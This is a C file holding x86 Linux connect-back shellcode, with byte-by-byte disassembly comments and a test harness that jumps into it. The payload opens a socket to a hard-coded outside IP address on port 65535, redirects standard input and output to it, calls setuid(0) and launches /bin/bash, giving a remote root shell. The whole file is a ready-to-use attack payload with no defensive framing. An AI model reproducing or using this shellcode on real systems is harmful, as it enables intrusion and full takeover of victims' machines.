/*
 * connectback, setuid, execve /bin/bash linux shellcode by BreeZe <breeze@binbash.org>
 */

#define info    "setuid(0), connectback execve /bin/bash /bin/bash 0 to port 65535"

#include <stdio.h>

char shellcode[] =    

/* socket */
"\x31\xc0"			// xor    %eax,%eax
"\x89\x45\x10"			// mov    %eax,0x10(%ebp)
"\x40"				// inc    %eax
"\x89\xc3"			// mov    %eax,%ebx
"\x89\x45\x0c"			// mov    %eax,0xc(%ebp)
"\x40"				// inc    %eax
"\x89\x45\x08"			// mov    %eax,0x8(%ebp)
"\x8d\x4d\x08"			// lea    0x8(%ebp),%ecx
"\xb0\x66"			// mov    $0x66,%al
"\xcd\x80"			// int    $0x80

/* connect */
"\x89\x45\x08"			// mov    %eax,0x8(%ebp)
"\x43"				// inc    %ebx
"\x89\x5d\x14"			// mov    %ebx,0x14(%ebp)
"\x43"				// inc    %ebx
"\x66\xc7\x45\x16\xff\xff"	// movw   $0xffff,0x16(%ebp) (port: 65535 -> 0xffff)
"\xc7\x45\x18\xc6\x51\x81\x64"	// movl   $0x648151c6,0x18(%ebp) (ip: 198.81.129.100 -> hex value: 0x648151c6)
"\x8d\x55\x14"			// lea    0x14(%ebp),%edx
"\x89\x55\x0c"			// mov    %edx,0xc(%ebp)
"\xc6\x45\x10\x10"		// movb   $0x10,0x10(%ebp)
"\xb0\x66"			// mov    $0x66,%al
"\xcd\x80"			// int    $0x80

/* dup2 */
"\x31\xc9"			// xor    %ecx,%ecx
"\xb0\x3f"			// mov    $0x3f,%al
"\xcd\x80"			// int    $0x80

/* dup2 */
"\x41"				// inc    %ecx
"\xb0\x3f"			// mov    $0x3f,%al
"\xcd\x80"			// int    $0x80

/* dup2 */
"\x41"				// inc    %ecx
"\xb0\x3f"			// mov    $0x3f,%al
"\xcd\x80"			// int    $0x80

/* jump to G2C */
"\xeb\x22"			// jmp    80480ed <G2C>

/* start <shellcode> */
/* setuid */
"\x31\xc0"			// xor    %eax,%eax
"\x31\xdb"			// xor    %ebx,%ebx
"\xb0\x17"			// mov    $0x17,%al
"\xcd\x80"			// int    $0x80

/* execve /bin/sh */
"\x5e"				// pop    %esi
"\x31\xc0"			// xor    %eax,%eax
"\x88\x46\x09"			// mov    %al,0x9(%esi)
"\x8d\x1e"			// lea    (%esi),%ebx
"\x89\x5e\x0a"			// mov    %ebx,0xa(%esi)
"\x89\x46\x0e"			// mov    %eax,0xe(%esi)
"\xb0\x0b"			// mov    $0xb,%al
"\x89\xf3"			// mov    %esi,%ebx
"\x8d\x4e\x0a"			// lea    0xa(%esi),%ecx
"\x8d\x56\x0e"			// lea    0xe(%esi),%edx
"\xcd\x80"			// int    $0x80

/* G2C */
"\xe8\xd9\xff\xff\xff"		// call   80480cb <shellcode>
"\x2f"				// das
"\x62\x69\x6e"			// bound  %ebp,0x6e(%ecx)
"\x2f"				// das
"\x62\x61\x73"			// bound  %esp,0x73(%ecx)
"\x68\x54\x52\x4f\x45"		// push   $0x454f5254
"\x50"				// push   %eax
"\x4a"				// dec    %edx
"\x55"				// push   %ebp
"\x48"				// dec    %eax
"\x53"				// push   %ebx
;

int
main()
{
	int *ret;
	ret = (int *)&ret + 2;
	printf("Shellcode info = %s\n",info);
	printf("Shellcode length = %d\n",strlen(shellcode));
	(*ret) = (int)shellcode;
}